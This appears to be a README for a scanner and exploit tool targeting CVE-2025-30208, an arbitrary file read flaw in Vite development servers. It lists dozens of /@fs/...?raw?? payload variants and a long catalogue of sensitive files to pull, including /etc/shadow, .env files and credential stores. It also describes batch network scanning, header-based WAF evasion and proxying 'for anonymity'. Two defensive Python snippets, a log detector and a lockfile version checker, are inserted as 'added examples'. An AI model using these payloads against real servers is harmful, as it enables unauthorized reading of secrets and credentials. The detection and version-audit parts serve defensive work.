## https://sploitus.com/exploit?id=7DB02D74-4971-549C-B89D-1F320A7D2880
# 🔥 CVE-2025-30208 Vite Arbitrary File Read Vulnerability Scanner

<div align="center">

![Python](https://img.shields.io/badge/Python-3.7+-blue.svg)
![License](https://img.shields.io/badge/License-Educational-green.svg)
![Security](https://img.shields.io/badge/Security-Pentesting-red.svg)
![Status](https://img.shields.io/badge/Status-Active-brightgreen.svg)
![Modular](https://img.shields.io/badge/Architecture-Modular-orange.svg)

**Advanced vulnerability scanner for CVE-2025-30208 with enterprise-grade features**

*Professional penetration testing tool for Vite Arbitrary File Read vulnerability detection*

[🚀 Quick Start](#-quick-start) • [📋 Features](#-features) • [🔧 Usage](#-usage) • [📊 Examples](#-examples) • [🛡️ Security](#️-security)

</div>

---

## 📖 Overview

This is a comprehensive vulnerability scanner designed to detect and exploit the **CVE-2025-30208** vulnerability in Vite development servers. The vulnerability allows arbitrary file read access through Vite's file system endpoints, potentially exposing sensitive configuration files, source code, and system information.

### 🎯 What This Tool Does

- **Detects** vulnerable Vite instances across networks
- **Exploits** the arbitrary file read vulnerability safely
- **Discovers** sensitive files and configuration data
- **Reports** findings in multiple formats (HTML, JSON, Console)
- **Manages** scanning sessions and configurations
- **Handles** errors gracefully with automatic retry mechanisms

### 🏗️ Modular Architecture

The tool now features a **modular architecture** for better maintainability and extensibility:

- **`CVE-2025-30208.py`** - Main scanner application
- **`payloads.py`** - Advanced exploitation payloads (60+ variations)
- **`sensitive_files.py`** - Comprehensive sensitive file database (200+ files)
- **`html_template.py`** - Enhanced hacker-style HTML reporting template

---

## 🚀 Quick Start

### Prerequisites

```bash
pip3 install -r requirements.txt
```

### Basic Usage

```bash
python3 CVE-2025-30208.py

CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
```

---

## 📋 Features

### 🔍 Core Vulnerability Detection
- **60+ Advanced Payloads**: Comprehensive exploitation techniques for maximum detection
- **Smart Detection**: Intelligent response analysis to avoid false positives
- **Real-time Validation**: Continuous validation of target responses
- **Comprehensive Testing**: Tests all known vulnerable endpoints

### 🛡️ Enhanced Security Features
- **Proxy Support**: HTTP/HTTPS proxy configuration for anonymity
- **Custom Headers**: Bypass WAF/IPS with custom HTTP headers
- **Rate Limiting**: Configurable delays to avoid detection
- **Session Management**: Save and restore scanning sessions
- **Input Validation**: Comprehensive parameter validation

### 🔧 Advanced Capabilities
- **Batch Scanning**: Multi-threaded scanning of multiple targets
- **Sensitive File Discovery**: Automated discovery of 200+ sensitive files
- **Connectivity Testing**: TCP/UDP/HTTP/HTTPS protocol testing
- **Error Recovery**: Automatic retry with exponential backoff
- **Comprehensive Logging**: Detailed logs with timestamps

### 📊 Reporting & Output
- **🎨 Enhanced HTML Reports**: Beautiful hacker-style vulnerability reports with animations
- **JSON Export**: Structured data for further analysis
- **Console Output**: Color-coded real-time feedback
- **Log Files**: Detailed audit trails
- **Interactive Web Interface**: Built-in web server for viewing reports

---

## 🔧 Usage Guide

### 1. Basic Configuration

```bash
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd

CVE-2025-30208 > test
```

### 2. Vulnerability Testing

```bash
CVE-2025-30208 > run

# Enable verbose mode for detailed output
CVE-2025-30208 > verbose
CVE-2025-30208 > run
```

### 3. Batch Scanning

```bash
CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch

192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[Press Enter twice to finish]
```

### 4. Sensitive File Discovery

```bash
CVE-2025-30208 > scan
```

### 5. Advanced Configuration

```bash
# Configure proxy
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080

# Set custom headers
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Custom Scanner"}

# Configure rate limiting
CVE-2025-30208 > rate
Enter rate limit: 1.0
```

### 6. Enhanced HTML Reporting

```bash
# Generate beautiful HTML report
CVE-2025-30208 > pull

# Start web server to view report
CVE-2025-30208 > web

# Start web server on specific port
CVE-2025-30208 > web 8081

# Stop web server
CVE-2025-30208 > web off
```

---

## 📊 Command Reference

| Command | Description | Example |
|---------|-------------|---------|
| `set <option> <value>` | Set configuration options | `set RHOST 192.168.1.100` |
| `show options` | Display current settings | `show options` |
| `edit` | Interactive option editor | `edit` |
| `run` / `exploit` | Run vulnerability test | `run` |
| `batch` | Batch scan multiple targets | `batch` |
| `scan` | Discover sensitive files | `scan` |
| `pull` | Export results to HTML/JSON | `pull` |
| `web [on\|off\|port]` | Web server for HTML reports | `web 8080` |
| `save` | Save session configuration | `save` |
| `load` | Load session configuration | `load` |
| `test` | Test connectivity to target | `test` |
| `validate` | Validate current configuration | `validate` |
| `verbose` | Toggle verbose mode | `verbose` |
| `proxy` | Configure proxy settings | `proxy` |
| `headers` | Set custom HTTP headers | `headers` |
| `rate` | Configure rate limiting | `rate` |
| `log` | Show logging information | `log` |
| `help` / `?` | Show help | `help` |
| `exit` / `quit` | Exit tool | `exit` |

---

## ⚙️ Configuration Options

| Option | Description | Default | Validation |
|--------|-------------|---------|------------|
| `RHOST` | Target host/IP address | - | Hostname/IP validation |
| `RPORT` | Target port number | - | Port range (1-65535) |
| `FILEPATH` | File path to test | `etc/passwd` | Path validation |
| `PROXY` | HTTP/HTTPS proxy URL | - | URL format validation |
| `VERBOSE` | Enable verbose output | `false` | Boolean validation |
| `RATE_LIMIT` | Delay between requests (seconds) | `0.3` | Numeric validation |
| `THREADS` | Number of threads for batch scanning | `5` | Integer validation |
| `TIMEOUT` | Request timeout (seconds) | `5` | Integer validation |
| `CUSTOM_HEADERS` | Custom HTTP headers (JSON) | `{}` | JSON format validation |

---

## 🎨 Enhanced Payload System

The scanner now uses **60+ different payload variations** organized in `payloads.py`:

### Primary @fs Payloads
```bash
/@fs/{file_path}?raw??
/@fs/{file_path}?raw&url
/@fs/{file_path}?import&raw??
/@fs/{file_path}?raw&import
/@fs/{file_path}?import&url
```

### Extended Parameter Variations
```bash
/@fs/{file_path}?raw&source
/@fs/{file_path}?raw&content
/@fs/{file_path}?raw&data
/@fs/{file_path}?raw&file
/@fs/{file_path}?raw&type=text
/@fs/{file_path}?raw&format=text
/@fs/{file_path}?raw&encoding=utf8
```

### Vite-Specific Variations
```bash
/@fs/{file_path}?raw&vite&dev
/@fs/{file_path}?raw&vite&hot
/@fs/{file_path}?raw&vite&hmr
/@fs/{file_path}?raw&development
/@fs/{file_path}?raw&debug
```

### Module System Variations
```bash
/@fs/{file_path}?raw&esm
/@fs/{file_path}?raw&cjs
/@fs/{file_path}?raw&umd
/@fs/{file_path}?raw&js
/@fs/{file_path}?raw&ts
/@fs/{file_path}?raw&json
/@fs/{file_path}?raw&css
/@fs/{file_path}?raw&html
```

### Alternative Endpoints
```bash
/app/{file_path}?raw??
/App/{file_path}?raw??
```
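
Seen from the defending side, the request shapes listed above are also what to look for in the access log of a dev server or the reverse proxy in front of it. The following detector is an added example, not code from this tool; the log format (combined access log), the sample lines and the `classify`/`scan` names are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Request field of a combined-format access log line.
LOG_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# Subset of the sensitive paths listed on this page.
SENSITIVE_HINTS = ("etc/passwd", "etc/shadow", "proc/self/environ", ".env", ".git/config")

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Apr/2025:10:00:01 +0000] "GET /@fs/etc/passwd?raw?? HTTP/1.1" 200 1843',
    '203.0.113.7 - - [01/Apr/2025:10:00:02 +0000] "GET /@fs/app/.env?import&raw?? HTTP/1.1" 403 312',
    '198.51.100.4 - - [01/Apr/2025:10:00:03 +0000] "GET /@fs/home/dev/proj/src/logo.svg?import HTTP/1.1" 200 911',
    '198.51.100.4 - - [01/Apr/2025:10:00:04 +0000] "GET /src/main.ts HTTP/1.1" 200 420',
]


def classify(line):
    """Return a finding dict for a suspicious request line, else None."""
    m = LOG_RE.search(line)
    if not m:
        return None
    # Decode first so percent-encoded variants of the same request still match.
    target = unquote(m["target"])
    path, _, query = target.partition("?")
    names = {tok.split("=", 1)[0] for tok in re.split(r"[&?]", query)}
    if not names & {"raw", "import", "url"}:
        return None
    fs = path.startswith("/@fs/")
    alt = path.startswith(("/app/", "/App/"))  # alternative endpoints listed above
    doubled = "??" in query                    # the "??" suffix seen in the payloads above
    sensitive = any(hint in path for hint in SENSITIVE_HINTS)
    if ((fs or alt) and doubled) or (fs and sensitive):
        level = "high"
    elif fs:
        level = "review"  # may be ordinary dev traffic inside the project root
    else:
        return None
    return {"level": level, "path": path, "query": query, "served": m["status"] == "200"}


def scan(lines):
    """Classify every line and keep only the findings."""
    return [f for f in map(classify, lines) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A `high` finding with `served` set to true means the server answered 200 to one of these request shapes and the response should be treated as a possible file disclosure.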

---

## 🔍 Enhanced Sensitive File Discovery

The tool now tests for **200+ sensitive files** organized in `sensitive_files.py`:

### 🖥️ System Files (Linux/Unix)
- `/etc/passwd` - User account information
- `/etc/shadow` - Encrypted password data
- `/etc/services` - Network services
- `/etc/hosts` - Hostname mappings
- `/etc/fstab` - File system table
- `/etc/ssh/sshd_config` - SSH server configuration
- `/etc/crontab` - System cron jobs
- `/etc/sudoers` - Sudo configuration

### 📊 Process Information
- `/proc/version` - Kernel version
- `/proc/cpuinfo` - CPU information
- `/proc/meminfo` - Memory information
- `/proc/self/environ` - Process environment
- `/proc/self/cmdline` - Process command line
- `/proc/net/tcp` - TCP connections
- `/proc/net/udp` - UDP connections

### ⚙️ Application Configuration
- `.env` - Environment variables
- `.env.local` - Local environment
- `.env.production` - Production environment
- `config.json` - Application configuration
- `settings.json` - Application settings
- `application.properties` - Spring configuration
- `application.yml` - YAML configuration
- `database.yml` - Database configuration
- `secrets.json` - Secret management

### 📦 Node.js / JavaScript Files
- `package.json` - Node.js dependencies
- `package-lock.json` - Locked dependencies
- `yarn.lock` - Yarn lock file
- `vite.config.js` - Vite configuration
- `vite.config.ts` - TypeScript Vite config
- `tsconfig.json` - TypeScript configuration
- `webpack.config.js` - Webpack configuration
- `next.config.js` - Next.js configuration
- `nuxt.config.js` - Nuxt.js configuration
- `angular.json` - Angular configuration
- `vue.config.js` - Vue.js configuration
- `rollup.config.js` - Rollup configuration
- `eslint.config.js` - ESLint configuration
- `prettier.config.js` - Prettier configuration
- `jest.config.js` - Jest configuration
- `babel.config.js` - Babel configuration
- `tailwind.config.js` - Tailwind CSS configuration

### 🔧 Git Files
- `.git/config` - Git configuration
- `.gitignore` - Git ignore rules
- `.gitattributes` - Git attributes
- `.gitmodules` - Git submodules
- `.git/HEAD` - Current branch
- `.git/logs/HEAD` - Git logs
- `.git/refs/heads/master` - Master branch
- `.git/refs/heads/main` - Main branch

### 📚 Documentation Files
- `README.md` - Project documentation
- `CHANGELOG.md` - Change log
- `LICENSE` - License information
- `CONTRIBUTING.md` - Contribution guidelines
- `AUTHORS` - Author information
- `TODO.md` - Todo list
- `ROADMAP.md` - Development roadmap

### 🐳 Docker Files
- `Dockerfile` - Docker configuration
- `docker-compose.yml` - Docker Compose
- `docker-compose.override.yml` - Override configuration
- `.dockerignore` - Docker ignore rules
- `docker-compose.prod.yml` - Production configuration
- `docker-compose.dev.yml` - Development configuration

### 🌐 Web Server Configuration
- `nginx.conf` - Nginx configuration
- `apache2.conf` - Apache configuration
- `httpd.conf` - HTTP daemon config
- `.htaccess` - Apache access control
- `web.config` - IIS configuration
- `robots.txt` - Search engine directives
- `sitemap.xml` - Site structure
- `manifest.json` - Web app manifest
- `sw.js` - Service worker
- `firebase.json` - Firebase configuration
- `firebase.rules` - Firebase security rules

### 🪟 Windows Files
- `boot.ini` - Boot configuration
- `autoexec.bat` - Auto-execution script
- `system.ini` - System configuration
- `win.ini` - Windows configuration
- `Users` - User directories
- `Windows` - System files
- `Program Files` - Application directories

### 🍎 macOS Files
- `System` - System files
- `Library` - Library files
- `Applications` - Application files
- `private/etc/hosts` - Hosts file
- `private/etc/passwd` - User accounts

### 🗄️ Database Files
- `database.db` - SQLite database
- `database.sqlite` - SQLite database
- `data.db` - Data database
- `dump.sql` - Database dump
- `schema.sql` - Database schema
- `migrations` - Database migrations

### 📝 Log Files
- `logs` - Log directory
- `error.log` - Error logs
- `access.log` - Access logs
- `app.log` - Application logs
- `debug.log` - Debug logs
- `combined.log` - Combined logs

### 💾 Backup Files
- `backup` - Backup directory
- `backup.sql` - Database backup
- `backup.zip` - Compressed backup
- `dump` - Data dump
- `export` - Data export

### 🔒 Security & Authentication
- `auth.json` - Authentication configuration
- `credentials.json` - Credential storage
- `keys.json` - Key management
- `tokens.json` - Token storage
- `jwt.json` - JWT configuration
- `oauth.json` - OAuth configuration

### 🔌 API & Service Files
- `api.json` - API configuration
- `swagger.json` - API documentation
- `openapi.json` - OpenAPI specification
- `graphql.json` - GraphQL configuration
- `schema.json` - API schema

### ☁️ Cloud & Deployment
- `cloudformation.yml` - AWS CloudFormation
- `serverless.yml` - Serverless configuration
- `terraform.tf` - Terraform configuration
- `kubernetes.yml` - Kubernetes configuration
- `k8s.yml` - Kubernetes configuration

### 📊 Monitoring & Analytics
- `analytics.json` - Analytics configuration
- `monitoring.json` - Monitoring setup
- `metrics.json` - Metrics configuration
- `telemetry.json` - Telemetry data

---

## 🎨 Enhanced HTML Reporting

The tool now generates **beautiful hacker-style HTML reports** with:

### ✨ Visual Features
- **Matrix-style background** with animated falling characters
- **Gradient animations** and glowing effects
- **Interactive elements** with hover effects
- **Responsive design** for all devices
- **Dark theme** optimized for security professionals

### 📊 Interactive Statistics
- **Real-time counters** for total leaks and bytes exposed
- **Severity indicators** with color coding
- **Copy functionality** for each leak
- **Content preview** with size and line count
- **Expandable sections** for detailed analysis

### 🔧 Technical Features
- **Google Fonts integration** (JetBrains Mono, Orbitron)
- **CSS animations** and transitions
- **JavaScript interactivity** for enhanced UX
- **Mobile-responsive** design
- **Cross-browser compatibility**

### 🌐 Web Server Integration
- **Built-in HTTP server** for viewing reports
- **Automatic browser opening**
- **Port configuration** options
- **Easy start/stop** commands

---

## 🛡️ Error Handling & Recovery

### Automatic Retry Mechanism
- **3 Retry Attempts**: Failed requests are automatically retried
- **Exponential Backoff**: Increasing delays between retries
- **Smart Error Classification**: Different handling for different error types
- **Graceful Recovery**: Tool continues operation after errors

### Error Categories
- **NetworkError**: Connection, timeout, proxy issues
- **ConfigurationError**: Invalid settings and parameters
- **ValidationError**: Invalid input parameters
- **ScannerError**: General scanner errors

### Validation Features
- **Real-time Input Validation**: All parameters validated before use
- **Configuration Validation**: Complete validation before scanning
- **Connectivity Testing**: TCP/UDP/HTTP/HTTPS protocol testing
- **Proxy Validation**: Proxy URL format validation

---

## 📁 Output Files

| File | Description | Format |
|------|-------------|--------|
| `data_leak.html` | Enhanced hacker-style HTML vulnerability report | HTML |
| `data_leak.json` | Structured JSON export | JSON |
| `sensitive_files_discovery.json` | Discovered sensitive files | JSON |
| `session.json` | Saved session configuration | JSON |
| `logs/cve_2025_30208_YYYYMMDD_HHMMSS.log` | Detailed audit logs | Text |

---

## 📝 Affected Versions

### 🚨 Vulnerable Versions
```
6.2.0 ≤ Vite ≤ 6.2.2
6.1.0 ≤ Vite ≤ 6.1.1
6.0.0 ≤ Vite ≤ 6.0.11
5.0.0 ≤ Vite ≤ 5.4.14
Vite ≤ 4.5.9
```

### ✅ Unaffected Versions
```
Vite ≥ 6.2.3
6.1.2 ≤ Vite < 6.2.0
6.0.12 ≤ Vite < 6.1.0
5.4.15 ≤ Vite < 6.0.0
4.5.10 ≤ Vite < 5.0.0
```
```
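
The ranges above can be checked against a project without sending any request, by reading the resolved `vite` versions out of its `package-lock.json`. This is an added example, not part of this tool; it assumes an npm lockfile with a `packages` map (lockfileVersion 2 or 3), and the sample lockfile and its package names are constructed.

```python
import json
import re

# Affected ranges as listed on this page, inclusive on both ends.
AFFECTED = [
    ((6, 2, 0), (6, 2, 2)),
    ((6, 1, 0), (6, 1, 1)),
    ((6, 0, 0), (6, 0, 11)),
    ((5, 0, 0), (5, 4, 14)),
    ((0, 0, 0), (4, 5, 9)),
]
# First unaffected release per 6.x line, from the "Unaffected Versions" list.
FIXED_6 = {(6, 2): "6.2.3", (6, 1): "6.1.2", (6, 0): "6.0.12"}

# Constructed package-lock.json; the dependency layout is made up.
SAMPLE_LOCK = json.dumps({
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app"},
        "node_modules/vite": {"version": "6.2.2"},
        "node_modules/some-tool/node_modules/vite": {"version": "5.4.15"},
        "node_modules/legacy-kit/node_modules/vite": {"version": "4.5.9"},
        "node_modules/vite-plugin-x": {"version": "1.0.0"},
    },
})


def parse(version):
    """'6.2.2' -> (6, 2, 2). Assumption: pre-release suffixes are ignored."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", version)
    if not m:
        raise ValueError(f"unparseable version: {version!r}")
    return tuple(int(g) for g in m.groups())


def is_affected(version):
    v = parse(version)
    return any(low <= v <= high for low, high in AFFECTED)


def first_fixed(version):
    """Closest unaffected release on the same release line, per the page."""
    v = parse(version)
    if v[0] <= 4:
        return "4.5.10"
    if v[0] == 5:
        return "5.4.15"
    return FIXED_6.get(v[:2], "6.2.3")


def audit_lockfile(text):
    """List every installed copy of vite, including nested ones."""
    findings = []
    for path, meta in json.loads(text).get("packages", {}).items():
        if path == "node_modules/vite" or path.endswith("/node_modules/vite"):
            ver = meta["version"]
            bad = is_affected(ver)
            findings.append((path, ver, bad, first_fixed(ver) if bad else None))
    return findings
```

Nested copies matter here: a patched top-level `vite` does not help if another dependency pins an affected version and runs its own dev server.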

---

## 🛡️ Security & Ethical Usage

### ⚠️ Important Security Notes
- **Authorized Testing Only**: Use only on systems you own or have explicit permission to test
- **Responsible Disclosure**: Report vulnerabilities to system owners
- **Rate Limiting**: Use appropriate delays to avoid overwhelming targets
- **Proxy Usage**: Consider using proxies for anonymity when appropriate
- **Legal Compliance**: Ensure compliance with local laws and regulations

### 🔒 Best Practices
- Always obtain written permission before testing
- Use in controlled environments only
- Document all testing activities
- Respect rate limits and system resources
- Report findings responsibly

---

## 🚀 Advanced Usage Examples

### Example 1: Comprehensive Network Scan
```bash
CVE-2025-30208 > set THREADS 20
CVE-2025-30208 > set RATE_LIMIT 0.5
CVE-2025-30208 > set TIMEOUT 10
CVE-2025-30208 > verbose
CVE-2025-30208 > batch
```

### Example 2: Stealth Scanning with Proxy
```bash
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"}
CVE-2025-30208 > set RATE_LIMIT 2.0
CVE-2025-30208 > run
```

### Example 3: Enhanced Reporting Workflow
```bash
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > pull
CVE-2025-30208 > web 8080
```

### Example 4: Sensitive File Discovery
```bash
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > scan
```

---

## 🏗️ Project Structure

```
CVE-2025-30208/
├── CVE-2025-30208.py          # Main scanner application
├── payloads.py                # Advanced exploitation payloads (60+)
├── sensitive_files.py         # Sensitive file database (200+)
├── html_template.py           # Enhanced HTML reporting template
├── README.md                  # This documentation
├── requirements.txt           # Python dependencies
├── logs/                      # Log files directory
├── data_leak.html            # Generated HTML reports
├── data_leak.json            # Generated JSON reports
└── session.json              # Saved session configurations
```

---

## 🤝 Contributing

We welcome contributions to improve this tool:

1. **Fork** the repository
2. **Create** a feature branch
3. **Make** your changes
4. **Test** thoroughly
5. **Submit** a pull request

### Contribution Areas
- New payload variations in `payloads.py`
- Additional sensitive file patterns in `sensitive_files.py`
- Enhanced HTML templates in `html_template.py`
- Improved error handling
- Performance optimizations
- Documentation improvements

---

## 📄 License

This project is licensed for **educational and authorized security testing purposes only**.

**⚠️ Legal Disclaimer**: This tool is intended for authorized security testing and research purposes only. Users are responsible for ensuring they have proper authorization before testing any systems. The authors are not responsible for any misuse of this tool.

---

## 👨‍💻 Author

<div align="center">

**ThemeHackers**

[![GitHub](https://img.shields.io/badge/GitHub-ThemeHackers-blue?style=for-the-badge&logo=github)](https://github.com/ThemeHackers)

*Security Researcher & Penetration Tester*

</div>

---

<div align="center">

**⭐ If this tool helped you, please give it a star! ⭐**

*Built with ❤️ for the security community*

</div>